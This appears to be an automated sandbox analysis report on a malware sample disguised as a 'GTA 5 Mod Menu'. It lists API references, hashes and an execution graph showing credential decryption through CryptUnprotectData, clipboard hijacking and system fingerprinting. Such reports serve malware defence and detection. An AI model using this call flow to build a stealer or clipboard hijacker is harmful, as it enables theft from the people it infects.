                                                                    • Instruction ID: fc779d9721de02147df9c86ccca348a8b832f2456aaf1e484bce7ab526278670
                                                                    • Opcode Fuzzy Hash: 570e29c9cc324a919aa2efa42e853d5bb62ee6bec9447f22304c7ac9d222a9e7
                                                                    • Instruction Fuzzy Hash: AB512871A00305AAFF29AB748C42FB673A8EF45720F140429F5559B181FB75D980BBE3
                                                                    APIs
                                                                    • EncodePointer.KERNEL32(00000000,00000000,00000000,?,?,?,?,?,?,00F95031,?,?,00000000,00000000,00000000,?), ref: 00F95155
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: EncodePointer
                                                                    • String ID: MOC$RCC
                                                                    • API String ID: 2118026453-2084237596
                                                                    • Opcode ID: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
                                                                    • Instruction ID: 15b4edef40b31ab67fafd0b017be3f3827c9f1472f3629d8044dee6645c1a279
                                                                    • Opcode Fuzzy Hash: 15ba95f8a57b5a7b4b5c12a3eb192ee1216996a9392f1101337f04f80e8da9b0
                                                                    • Instruction Fuzzy Hash: 44417931D00609AFEF16DF98DC81AEE7BB5FF48714F184069FA0567211D335A991EB50
                                                                    APIs
                                                                    • ___except_validate_context_record.LIBVCRUNTIME ref: 00F94C13
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: ___except_validate_context_record
                                                                    • String ID: csm$csm
                                                                    • API String ID: 3493665558-3733052814
                                                                    • Opcode ID: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
                                                                    • Instruction ID: 301ca63cc9da68eba751d3467e0e8fd9d4a6b1bca96fe5e9c9a4ceb3024aa40d
                                                                    • Opcode Fuzzy Hash: 8b4f7d858d5dc019287e76bcd60908bca01627e6996d013cddc0e698195dc029
                                                                    • Instruction Fuzzy Hash: 8331CF76801218AFEF268F50DC44D6A7B65FF29325B18825AF8545A121C332ECA3FF91
                                                                    APIs
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000003.00000002.2096902371.0000000000F81000.00000020.00000001.01000000.00000003.sdmp, Offset: 00F80000, based on PE: true
                                                                    • Associated: 00000003.00000002.2096888451.0000000000F80000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096922060.0000000000FA6000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096936284.0000000000FB0000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096949572.0000000000FB4000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                    • Associated: 00000003.00000002.2096964575.0000000000FB7000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_3_2_f80000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID: AddressProc
                                                                    • String ID: @$VirtualProtect
                                                                    • API String ID: 190572456-29487290
                                                                    • Opcode ID: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
                                                                    • Instruction ID: e7c224b8d8855387e409e117010beecc30fb3daa5ce2c357557c1872a0c11d0b
                                                                    • Opcode Fuzzy Hash: a5ce620f7789add63d321d081f2fc6aef5f0192c1daf5d7f73e275a691072fa7
                                                                    • Instruction Fuzzy Hash: CA41D1B0901209DFDB04EFA9D9986DEBBF0FF48354F10851AE848AB350D779A985DF81

                                                                    Execution Graph

                                                                    Execution Coverage:9.9%
                                                                    Dynamic/Decrypted Code Coverage:3.2%
                                                                    Signature Coverage:52.1%
                                                                    Total number of Nodes:495
                                                                    Total number of Limit Nodes:42
                                                                    execution_graph 14491 408780 14493 40878f 14491->14493 14492 408a88 ExitProcess 14493->14492 14494 4087a4 GetCurrentProcessId GetCurrentThreadId 14493->14494 14504 408a6c 14493->14504 14495 4087ca 14494->14495 14496 4087ce SHGetSpecialFolderPathW 14494->14496 14495->14496 14497 408900 14496->14497 14497->14497 14498 43b210 RtlAllocateHeap 14497->14498 14499 40893a GetForegroundWindow 14498->14499 14502 4089af 14499->14502 14501 408a71 14501->14504 14502->14501 14505 40c750 CoInitializeEx 14502->14505 14504->14492 14504->14501 14507 40c783 CoInitializeSecurity 13971 43dbcd 13972 43dbe0 13971->13972 13972->13972 13973 43dc8d GetForegroundWindow 13972->13973 13974 43dc9b 13973->13974 13975 415ad0 13976 415ad5 13975->13976 13977 415d07 13976->13977 13978 415cf6 13976->13978 13979 415d15 13976->13979 13982 415b87 13976->13982 13993 415d2b 13976->13993 13981 419440 3 API calls 13977->13981 14011 419440 13978->14011 13987 415fbe 13979->13987 13979->13993 13981->13979 13983 415ef4 13982->13983 13984 415c1f 13982->13984 13986 415ce6 13982->13986 13982->13993 13985 41bcf0 4 API calls 13983->13985 13999 41bcf0 13984->13999 13985->13986 13989 416092 13987->13989 14046 43cf30 LdrInitializeThunk 13987->14046 13989->13989 14047 43cf30 LdrInitializeThunk 13989->14047 13992 4162d2 13993->13983 13993->13986 13995 440390 13993->13995 13996 4403b0 13995->13996 13997 44051e 13996->13997 14048 43cf30 LdrInitializeThunk 13996->14048 13997->13993 14000 41bd18 13999->14000 14049 414280 14000->14049 14003 414280 4 API calls 14004 41beaa 14003->14004 14005 414280 4 API calls 14004->14005 14006 41bf1b 14005->14006 14007 414280 4 API calls 14006->14007 14008 41bfd4 14007->14008 14009 414280 4 API calls 14008->14009 14010 41c050 14009->14010 14010->13986 14012 419470 14011->14012 14017 4194be 14012->14017 14150 43cf30 LdrInitializeThunk 14012->14150 14014 41957e 14015 41960e 14014->14015 14038 4199c2 14014->14038 14152 43cf30 LdrInitializeThunk 14014->14152 14018 43b210 RtlAllocateHeap 14015->14018 14027 419779 14015->14027 14017->14014 14151 43cf30 LdrInitializeThunk 14017->14151 14022 4196ad 14018->14022 14020 41971f 14021 43b230 RtlFreeHeap 14020->14021 14021->14027 14022->14020 14153 43cf30 LdrInitializeThunk 14022->14153 14025 41994e 14026 419953 14025->14026 14029 4199f2 14025->14029 14026->14038 14155 43cf30 LdrInitializeThunk 14026->14155 14027->14025 14027->14026 14027->14038 14154 43cf30 LdrInitializeThunk 14027->14154 14031 419a62 14029->14031 14156 43cf30 LdrInitializeThunk 14029->14156 14032 419b8e 14031->14032 14157 43cf30 LdrInitializeThunk 14031->14157 14033 43b210 RtlAllocateHeap 14032->14033 14032->14038 14037 419be9 14033->14037 14035 41a2e8 14036 43b230 RtlFreeHeap 14035->14036 14036->14038 14044 419c5e 14037->14044 14158 43cf30 LdrInitializeThunk 14037->14158 14038->13977 14040 43b500 LdrInitializeThunk 14040->14044 14041 43b690 LdrInitializeThunk 14041->14044 14042 43b210 RtlAllocateHeap 14042->14044 14043 43b230 RtlFreeHeap 14043->14044 14044->14035 14044->14040 14044->14041 14044->14042 14044->14043 14045 43cf30 LdrInitializeThunk 14044->14045 14045->14044 14046->13989 14047->13992 14048->13997 14050 4142a0 14049->14050 14050->14050 14071 4401e0 14050->14071 14052 41438d 14053 4401e0 LdrInitializeThunk 14052->14053 14054 41463a 14053->14054 14055 4146fe 14054->14055 14059 414665 14054->14059 14075 43b210 14054->14075 14078 43b230 14055->14078 14059->14055 14082 438950 14059->14082 14099 43cf30 LdrInitializeThunk 14059->14099 14063 4401e0 LdrInitializeThunk 14070 414704 14063->14070 14067 440660 LdrInitializeThunk 14067->14070 14068 414cce 14068->14003 14069 43cf30 LdrInitializeThunk 14069->14070 14070->14063 14070->14067 14070->14068 14070->14069 14100 43b270 14070->14100 14110 43b500 14070->14110 14114 43b770 14070->14114 14122 43b690 14070->14122 14126 440570 14070->14126 14072 4401f0 14071->14072 14073 44033e 14072->14073 14130 43cf30 LdrInitializeThunk 14072->14130 14073->14052 14131 43e740 14075->14131 14077 43b21a RtlAllocateHeap 14077->14059 14079 43b245 14078->14079 14080 43b24b RtlFreeHeap 14078->14080 14081 43b243 14078->14081 14079->14080 14080->14070 14081->14070 14084 438960 14082->14084 14088 438a89 14084->14088 14133 43ced0 14084->14133 14142 43cf30 LdrInitializeThunk 14084->14142 14086 438e7a 14087 43b230 RtlFreeHeap 14086->14087 14089 438e93 14087->14089 14088->14086 14090 43b500 LdrInitializeThunk 14088->14090 14089->14059 14093 438acf 14090->14093 14091 43b690 LdrInitializeThunk 14091->14086 14092 43ced0 3 API calls 14092->14093 14093->14092 14094 43b230 RtlFreeHeap 14093->14094 14095 438ea0 14093->14095 14097 43cf30 LdrInitializeThunk 14093->14097 14098 438e7e 14093->14098 14094->14093 14096 43b230 RtlFreeHeap 14095->14096 14096->14098 14097->14093 14098->14091 14099->14059 14101 43b2a0 14100->14101 14102 43b30e 14101->14102 14143 43cf30 LdrInitializeThunk 14101->14143 14104 43b210 RtlAllocateHeap 14102->14104 14107 43b4d0 14102->14107 14105 43b366 14104->14105 14109 43b3fe 14105->14109 14144 43cf30 LdrInitializeThunk 14105->14144 14106 43b230 RtlFreeHeap 14106->14107 14107->14070 14109->14106 14111 43b5ee 14110->14111 14112 43b512 14110->14112 14111->14070 14112->14111 14145 43cf30 LdrInitializeThunk 14112->14145 14115 43b833 14114->14115 14117 43b78a 14114->14117 14115->14070 14116 43b98e 14116->14115 14118 43b690 LdrInitializeThunk 14116->14118 14117->14115 14120 43b82e 14117->14120 14146 43cf30 LdrInitializeThunk 14117->14146 14118->14115 14120->14116 14147 43cf30 LdrInitializeThunk 14120->14147 14123 43b73e 14122->14123 14124 43b6a5 14122->14124 14123->14070 14124->14123 14148 43cf30 LdrInitializeThunk 14124->14148 14127 440590 14126->14127 14128 44060e 14127->14128 14149 43cf30 LdrInitializeThunk 14127->14149 14128->14070 14130->14073 14132 43e750 14131->14132 14132->14077 14132->14132 14134 43cf0a 14133->14134 14135 43cee8 14133->14135 14138 43b210 RtlAllocateHeap 14134->14138 14136 43cef6 14135->14136 14137 43cf15 14135->14137 14141 43cefb RtlReAllocateHeap 14136->14141 14140 43b230 RtlFreeHeap 14137->14140 14139 43cf10 14138->14139 14139->14084 14140->14139 14141->14139 14142->14084 14143->14102 14144->14109 14145->14111 14146->14120 14147->14116 14148->14123 14149->14128 14150->14017 14151->14014 14152->14015 14153->14020 14154->14025 14155->14038 14156->14031 14157->14032 14158->14044 14508 420a10 14509 420a1e 14508->14509 14513 420a70 14508->14513 14514 420b30 14509->14514 14511 420aec 14512 41ed70 RtlAllocateHeap RtlFreeHeap RtlReAllocateHeap LdrInitializeThunk 14511->14512 14511->14513 14512->14513 14515 420b40 14514->14515 14515->14515 14516 440390 LdrInitializeThunk 14515->14516 14517 420c2f 14516->14517 14159 40e3d3 14160 40e3ef 14159->14160 14171 423270 14160->14171 14162 40e3f5 14177 4259e0 14162->14177 14164 40e455 14192 426260 14164->14192 14168 40e467 14208 432280 OpenClipboard 14168->14208 14172 4232d0 14171->14172 14172->14172 14173 4232ef RtlExpandEnvironmentStrings 14172->14173 14174 423340 14173->14174 14174->14174 14175 4233ba 14174->14175 14176 42339b RtlExpandEnvironmentStrings 14174->14176 14175->14162 14176->14175 14178 425c40 14177->14178 14179 425a0c 14177->14179 14185 425c78 14177->14185 14186 425ca0 14177->14186 14188 425d42 14177->14188 14180 43ced0 3 API calls 14178->14180 14179->14178 14179->14185 14179->14186 14179->14188 14191 425ed9 14179->14191 14238 43f050 14179->14238 14242 43f4d0 14179->14242 14180->14185 14183 43f050 LdrInitializeThunk 14183->14185 14185->14183 14185->14186 14185->14188 14185->14191 14218 43f1a0 14185->14218 14228 43fc30 14185->14228 14186->14188 14253 43cf30 LdrInitializeThunk 14186->14253 14188->14164 14191->14186 14191->14188 14252 43cf30 LdrInitializeThunk 14191->14252 14193 426290 14192->14193 14194 4262fe 14193->14194 14261 43cf30 LdrInitializeThunk 14193->14261 14195 40e45e 14194->14195 14196 43b210 RtlAllocateHeap 14194->14196 14202 4265c0 14195->14202 14200 42636c 14196->14200 14198 4263fe 14199 43b230 RtlFreeHeap 14198->14199 14199->14195 14200->14198 14262 43cf30 LdrInitializeThunk 14200->14262 14263 4265e0 14202->14263 14204 4265d4 14204->14168 14205 4265c9 14205->14204 14276 438eb0 14205->14276 14207 426d4d 14207->14168 14207->14207 14209 40e4b9 14208->14209 14210 4322a8 GetClipboardData 14208->14210 14211 4322c5 GlobalLock 14210->14211 14212 432414 CloseClipboard 14210->14212 14213 432412 14211->14213 14214 4322de 14211->14214 14212->14209 14213->14212 14215 432404 GlobalUnlock 14214->14215 14216 432316 GetWindowLongW 14214->14216 14215->14213 14217 432380 14216->14217 14217->14215 14219 43f1c0 14218->14219 14220 43f23e 14219->14220 14254 43cf30 LdrInitializeThunk 14219->14254 14221 43b210 RtlAllocateHeap 14220->14221 14226 43f4b4 14220->14226 14223 43f2ba 14221->14223 14227 43f363 14223->14227 14255 43cf30 LdrInitializeThunk 14223->14255 14224 43b230 RtlFreeHeap 14224->14226 14226->14185 14227->14224 14227->14227 14229 43fc3f 14228->14229 14229->14229 14230 43fdef 14229->14230 14256 43cf30 LdrInitializeThunk 14229->14256 14230->14230 14231 44000d 14230->14231 14232 43b210 RtlAllocateHeap 14230->14232 14231->14185 14234 43fe6d 14232->14234 14236 43ff4e 14234->14236 14257 43cf30 LdrInitializeThunk 14234->14257 14235 43b230 RtlFreeHeap 14235->14231 14236->14235 14239 43f070 14238->14239 14240 43f16f 14239->14240 14258 43cf30 LdrInitializeThunk 14239->14258 14240->14179 14243 43f4f0 14242->14243 14244 43f56e 14243->14244 14259 43cf30 LdrInitializeThunk 14243->14259 14246 43b210 RtlAllocateHeap 14244->14246 14250 43f888 14244->14250 14247 43f642 14246->14247 14251 43f6ee 14247->14251 14260 43cf30 LdrInitializeThunk 14247->14260 14248 43b230 RtlFreeHeap 14248->14250 14250->14179 14251->14248 14252->14191 14253->14188 14254->14220 14255->14227 14256->14230 14257->14236 14258->14240 14259->14244 14260->14251 14261->14194 14262->14198 14264 426640 14263->14264 14264->14264 14265 43b270 3 API calls 14264->14265 14266 426693 14265->14266 14267 43b500 LdrInitializeThunk 14266->14267 14268 42669f 14267->14268 14273 4266ab 14268->14273 14275 42675b 14268->14275 14283 43bb80 14268->14283 14269 43b690 LdrInitializeThunk 14271 426bb6 14269->14271 14271->14205 14272 426ad3 14272->14205 14272->14272 14273->14269 14275->14272 14275->14273 14275->14275 14293 43baa0 14275->14293 14281 438ee0 14276->14281 14277 43f050 LdrInitializeThunk 14277->14281 14278 43f4d0 3 API calls 14278->14281 14279 439068 14279->14207 14280 43fc30 3 API calls 14280->14281 14281->14277 14281->14278 14281->14279 14281->14280 14305 43cf30 LdrInitializeThunk 14281->14305 14285 43bbd0 14283->14285 14284 43c2ce 14284->14268 14292 43bc3e 14285->14292 14297 43cf30 LdrInitializeThunk 14285->14297 14288 43c243 14288->14284 14302 43cf30 LdrInitializeThunk 14288->14302 14290 43baa0 LdrInitializeThunk 14290->14292 14291 43cf30 LdrInitializeThunk 14291->14292 14292->14284 14292->14288 14292->14290 14292->14291 14292->14292 14298 43b9d0 14292->14298 14295 43bac0 14293->14295 14294 43bb3f 14294->14275 14295->14294 14304 43cf30 LdrInitializeThunk 14295->14304 14297->14292 14299 43b9f0 14298->14299 14300 43ba5e 14299->14300 14303 43cf30 LdrInitializeThunk 14299->14303 14300->14292 14302->14284 14303->14300 14304->14294 14305->14281 14518 422111 14519 422128 14518->14519 14519->14519 14524 4221be 14519->14524 14531 43cf30 LdrInitializeThunk 14519->14531 14521 4221fe 14522 422350 14523 422681 14523->14521 14532 43cf30 LdrInitializeThunk 14523->14532 14524->14521 14525 42230d 14524->14525 14526 422952 14524->14526 14525->14522 14525->14523 14534 43cf30 LdrInitializeThunk 14525->14534 14533 43cf30 LdrInitializeThunk 14526->14533 14529 422977 14531->14524 14532->14523 14533->14529 14534->14525 14535 43d096 14536 43d0b0 14535->14536 14536->14536 14537 43d12c 14536->14537 14539 43cf30 LdrInitializeThunk 14536->14539 14539->14537 14306 42b35b 14308 42b367 14306->14308 14307 42b42b GetComputerNameExA 14309 42b46b 14307->14309 14308->14307 14308->14308 14309->14309 14310 42dedb CoSetProxyBlanket 14540 41071b 14541 41073d 14540->14541 14542 410a6a RtlExpandEnvironmentStrings 14541->14542 14545 40eb09 14541->14545 14543 410add 14542->14543 14544 410b81 RtlExpandEnvironmentStrings 14543->14544 14543->14545 14544->14545 14316 420de0 14317 4401e0 LdrInitializeThunk 14316->14317 14318 420e20 14317->14318 14319 43b210 RtlAllocateHeap 14318->14319 14325 420e2c 14318->14325 14320 420e64 14319->14320 14329 420ed1 14320->14329 14331 43cf30 LdrInitializeThunk 14320->14331 14321 4214d5 14323 43b230 RtlFreeHeap 14321->14323 14326 4214e9 14323->14326 14324 43b210 RtlAllocateHeap 14324->14329 14326->14325 14333 43cf30 LdrInitializeThunk 14326->14333 14329->14321 14329->14324 14330 43b230 RtlFreeHeap 14329->14330 14332 43cf30 LdrInitializeThunk 14329->14332 14330->14329 14331->14320 14332->14329 14333->14326 14546 436a21 14550 43eb60 14546->14550 14549 436a6b 14551 436a39 GetUserDefaultUILanguage 14550->14551 14551->14549 14334 437960 14336 437980 14334->14336 14335 437c1e 14338 437aae 14336->14338 14343 43cf30 LdrInitializeThunk 14336->14343 14338->14335 14340 437b6e 14338->14340 14342 43cf30 LdrInitializeThunk 14338->14342 14340->14335 14344 43cf30 LdrInitializeThunk 14340->14344 14342->14340 14343->14338 14344->14335 14345 4153e8 14346 4153f2 14345->14346 14349 4153ff 14345->14349 14351 41542a 14345->14351 14356 41562e 14345->14356 14371 415768 14345->14371 14372 41543c 14345->14372 14348 440570 LdrInitializeThunk 14346->14348 14347 440570 LdrInitializeThunk 14347->14371 14348->14349 14349->14351 14349->14356 14349->14371 14349->14372 14379 440660 14349->14379 14353 416097 14351->14353 14351->14356 14351->14371 14351->14372 14352 415ac7 14357 415d07 14352->14357 14358 415cf6 14352->14358 14359 415d15 14352->14359 14364 415b87 14352->14364 14377 415d2b 14352->14377 14386 43cf30 LdrInitializeThunk 14353->14386 14354 440660 LdrInitializeThunk 14354->14371 14360 4401e0 LdrInitializeThunk 14356->14360 14362 419440 3 API calls 14357->14362 14361 419440 3 API calls 14358->14361 14373 415fbe 14359->14373 14359->14377 14360->14371 14361->14357 14362->14359 14366 415ef4 14364->14366 14367 415c1f 14364->14367 14364->14372 14364->14377 14370 41bcf0 4 API calls 14366->14370 14374 41bcf0 4 API calls 14367->14374 14368 415aa8 CryptUnprotectData 14368->14352 14368->14371 14368->14372 14369 416092 14369->14369 14388 43cf30 LdrInitializeThunk 14369->14388 14370->14372 14371->14347 14371->14352 14371->14354 14371->14368 14371->14372 14385 43cf30 LdrInitializeThunk 14371->14385 14373->14369 14387 43cf30 LdrInitializeThunk 14373->14387 14374->14372 14376 4162d2 14377->14366 14377->14372 14378 440390 LdrInitializeThunk 14377->14378 14378->14377 14380 440680 14379->14380 14383 4406fe 14380->14383 14389 43cf30 LdrInitializeThunk 14380->14389 14381 4407ce 14381->14351 14383->14381 14390 43cf30 LdrInitializeThunk 14383->14390 14385->14371 14386->14373 14387->14369 14388->14376 14389->14383 14390->14381 14552 43cfaa 14553 43cfd0 14552->14553 14555 43d03e 14553->14555 14556 43cf30 LdrInitializeThunk 14553->14556 14556->14555 14391 5ad1000 14392 5ad1102 14391->14392 14393 5ad1012 14391->14393 14394 5ad103a OpenClipboard 14393->14394 14395 5ad1030 Sleep 14393->14395 14396 5ad10f9 GetClipboardSequenceNumber 14394->14396 14397 5ad104a GetClipboardData 14394->14397 14395->14393 14396->14393 14398 5ad105a GlobalLock 14397->14398 14399 5ad10f3 CloseClipboard 14397->14399 14398->14399 14400 5ad106b GlobalAlloc 14398->14400 14399->14396 14402 5ad109d GlobalLock 14400->14402 14403 5ad10e9 GlobalUnlock 14400->14403 14404 5ad10b0 14402->14404 14403->14399 14405 5ad10b9 GlobalUnlock 14404->14405 14406 5ad10cb EmptyClipboard SetClipboardData 14405->14406 14407 5ad10e0 GlobalFree 14405->14407 14406->14403 14406->14407 14407->14403 14408 4236ec 14409 4236f8 14408->14409 14410 440390 LdrInitializeThunk 14409->14410 14411 4237e1 14410->14411 14557 4365ad 14560 4365cd 14557->14560 14558 43663c 14560->14558 14561 43cf30 LdrInitializeThunk 14560->14561 14561->14560 14562 40dbb0 14567 411e10 14562->14567 14564 40dbb6 14565 411e10 5 API calls 14564->14565 14566 40dbd6 14565->14566 14574 411e29 14567->14574 14568 411e30 14568->14564 14569 41390a CreateThread 14569->14574 14570 412511 RtlExpandEnvironmentStrings 14570->14574 14571 412782 RtlExpandEnvironmentStrings 14571->14574 14572 43cf30 LdrInitializeThunk 14572->14574 14574->14568 14574->14569 14574->14570 14574->14571 14574->14572 14576 43b230 RtlFreeHeap 14574->14576 14577 440020 14574->14577 14581 440820 14574->14581 14576->14574 14579 440030 14577->14579 14578 44017e 14578->14574 14579->14578 14587 43cf30 LdrInitializeThunk 14579->14587 14583 440840 14581->14583 14582 44098e 14582->14574 14585 4408be 14583->14585 14588 43cf30 LdrInitializeThunk 14583->14588 14585->14582 14589 43cf30 LdrInitializeThunk 14585->14589 14587->14578 14588->14585 14589->14582 14412 43b270 14413 43b2a0 14412->14413 14414 43b30e 14413->14414 14422 43cf30 LdrInitializeThunk 14413->14422 14416 43b210 RtlAllocateHeap 14414->14416 14419 43b4d0 14414->14419 14417 43b366 14416->14417 14421 43b3fe 14417->14421 14423 43cf30 LdrInitializeThunk 14417->14423 14418 43b230 RtlFreeHeap 14418->14419 14421->14418 14422->14414 14423->14421 14424 4328f0 14425 4328f5 14424->14425 14426 432928 GetSystemMetrics GetSystemMetrics 14425->14426 14427 432967 14426->14427 14428 43d2f7 14429 43d310 14428->14429 14430 43d37e 14429->14430 14435 43cf30 LdrInitializeThunk 14429->14435 14434 43cf30 LdrInitializeThunk 14430->14434 14433 43d46f 14434->14433 14435->14430 14436 40d3f6 14437 40d420 14436->14437 14442 437c80 14437->14442 14439 40d576 14440 437c80 11 API calls 14439->14440 14441 40d7cd 14440->14441 14441->14441 14443 437cb0 CoCreateInstance 14442->14443 14445 4384d1 14443->14445 14446 437f69 SysAllocString 14443->14446 14447 4384e1 GetVolumeInformationW 14445->14447 14450 437fdd 14446->14450 14449 4384ff 14447->14449 14449->14439 14451 437fe5 CoSetProxyBlanket 14450->14451 14452 4384bd SysFreeString 14450->14452 14453 4384b3 14451->14453 14454 438005 SysAllocString 14451->14454 14452->14445 14453->14452 14456 4380e0 14454->14456 14456->14456 14457 438112 SysAllocString 14456->14457 14460 438139 14457->14460 14458 43849d SysFreeString SysFreeString 14458->14453 14459 438493 14459->14458 14460->14458 14460->14459 14461 43817d VariantInit 14460->14461 14463 4381d0 14461->14463 14462 438482 VariantClear 14462->14459 14463->14462 14469 4330fb 14470 4330b6 14469->14470 14471 4330fe 14469->14471 14472 43301a 14471->14472 14475 433102 14471->14475 14474 43308f 14472->14474 14478 4336e0 14472->14478 14476 4336e0 GetObjectW 14475->14476 14477 433155 14476->14477 14479 43371d GetObjectW 14478->14479 14481 433811 14479->14481 14482 42be7c 14483 42be89 14482->14483 14484 42bf8e GetPhysicallyInstalledSystemMemory 14483->14484 14485 42bfd0 14484->14485 14485->14485 14486 42c2fd 14488 42c320 14486->14488 14487 42c3fe 14488->14487 14490 43cf30 LdrInitializeThunk 14488->14490 14490->14487
                                                                    Strings
                                                                    Memory Dump Source
                                                                    • Source File: 00000004.00000002.3337569166.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                    • Associated: 00000004.00000002.3337569166.0000000000452000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                    Joe Sandbox IDA Plugin
                                                                    • Snapshot File: hcaresult_4_2_400000_GTA-5-Mod-Menu-2025.jbxd
                                                                    Similarity
                                                                    • API ID:
                                                                    • String ID: $!$!$"$#$'$($)$*$+$,$-$.$2$4$4$6$7$8$8$:$@$A$B$B$B$B$C$D$D$D$D$F$H$I$J$L$L$M$N$N$P$P$Q$R$S$S$S$T$V$V$W$X$Z$Z$[$\$]$^$^$^$_$_$`$e$m$m$r$s$v$w$z$|$~$~
                                                                    • API String ID: 0-650732166
                                                                    • Opcode ID: 8476d63cc7d4c05428c07658a937d8cbb15d6580c753659a6c62e2790e8b69ab
                                                                    • Instruction ID: 2ff037e82c39d8484067e2ec1d8d6beae3856f8f60c524dd392be279c4487d9d
                                                                    • Opcode Fuzzy Hash: 8476d63cc7d4c05428c07658a937d8cbb15d6580c753659a6c62e2790e8b69ab
                                                                    • Instruction Fuzzy Hash: 5D03FF3150C7C18AC3359B3885843DFBFD16B96324F088A6EE5E9873D2D7B88586875B

                                                                    Control-flow Graph

                                                                    • Executed
                                                                    • Not Executed
                                                                    control_flow_graph 457 437c80-437ca1 458 437cb0-437ce8 457->458 458->458 459 437cea-437d04 458->459 460 437d10-437d43 459->460 460->460 461 437d45-437d83 460->461 462 437d90-437de5 461->462 462->462 463 437de7-437e06 462->463 465 437eac-437eb7 463->465 466 437e0c-437e15 463->466 468 437ec0-437f00 465->468 467 437e20-437e50 466->467 467->467 469 437e52-437e6a 467->469 468->468 470 437f02-437f63 CoCreateInstance 468->470 471 437e70-437e9d 469->471 472 4384d1-4384fd call 43eb60 GetVolumeInformationW 470->472 473 437f69-437f9a 470->473 471->471 475 437e9f-437ea4 471->475 479 438507-438509 472->479 480 4384ff-438503 472->480 476 437fa0-437fb4 473->476 475->465 476->476 478 437fb6-437fdf SysAllocString 476->478 485 437fe5-437fff CoSetProxyBlanket 478->485 486 4384bd-4384cd SysFreeString 478->486 481 43851d-438527 479->481 480->479 483 438540-438559 481->483 484 438529-438530 481->484 488 438560-43858c 483->488 484->483 487 438532-43853e 484->487 489 4384b3-4384b9 485->489 490 438005-438017 485->490 486->472 487->483 488->488 491 43858e-4385c1 488->491 489->486 492 438020-438058 490->492 494 4385d0-438605 491->494 492->492 493 43805a-4380d6 SysAllocString 492->493 495 4380e0-438110 493->495 494->494 496 438607-438637 call 41d780 494->496 495->495 497 438112-43813b SysAllocString 495->497 500 438640-438647 496->500 503 438141-438163 497->503 504 43849d-4384af SysFreeString * 2 497->504 500->500 502 438649-438667 500->502 505 438510-438517 502->505 506 43866d-43867d call 408060 502->506 511 438493-438499 503->511 512 438169-43816c 503->512 504->489 505->481 508 438682-438689 505->508 506->505 511->504 512->511 513 438172-438177 512->513 513->511 514 43817d-4381c8 VariantInit 513->514 515 4381d0-43821c 514->515 515->515 516 43821e-438230 515->516 517 438234-438239 516->517 518 438482-43848f VariantClear 517->518 519 43823f-438245 517->519 518->511 519->518 520 43824b-438255 519->520 521 438293 520->521 522 438257-43825c 520->522 524 438295-4382b0 call 407fb0 521->524 523 43826c-438270 522->523 525 438272-43827d 523->525 526 438260 523->526 533 4382b6-4382c3 524->533 534 438419-43843c 524->534 529 438286-43828c 525->529 530 43827f-438284 525->530 528 438261-43826a 526->528 528->523 528->524 529->528 532 43828e-438291 529->532 530->528 532->528 533->534 537 4382c9-4382d4 533->537 535 438475-43847e call 407fc0 534->535 536 43843e-438454 534->536 535->518 536->535 538 438456-43846c 536->538 540 4382e0-4382ea 537->540 538->535 543 43846e-438471 538->543 541 438300-438305 540->541 542 4382ec-4382f4 540->542 546 438307-43830a 541->546 547 438346-438354 541->547 545 438326-438328 542->545 543->535 549 43832a-43832e 545->549 546->547 548 43830c-438323 546->548 550 4383c7-4383d0 547->550 551 438356-438359 547->551 548->545 552 438331-438337 549->552 554 4383d2-4383d4 550->554 555 4383d9-4383de 550->555 551->550 553 43835b-4383c2 551->553 552->534 556 43833d-43833f 552->556 553->549 554->552 557 4383e0-43840a 555->557 558 43840f-438414 555->558 556->540 559 438341 556->559 557->549 558->549 559->534
                                                                    APIs
                                                                    • CoCreateInstance.OLE32(0044268C,00000000,00000001,0044267C,00000000), ref: 00437F54
                                                                    • SysAllocString.OLEAUT32(00001F7A), ref: 00437FB7
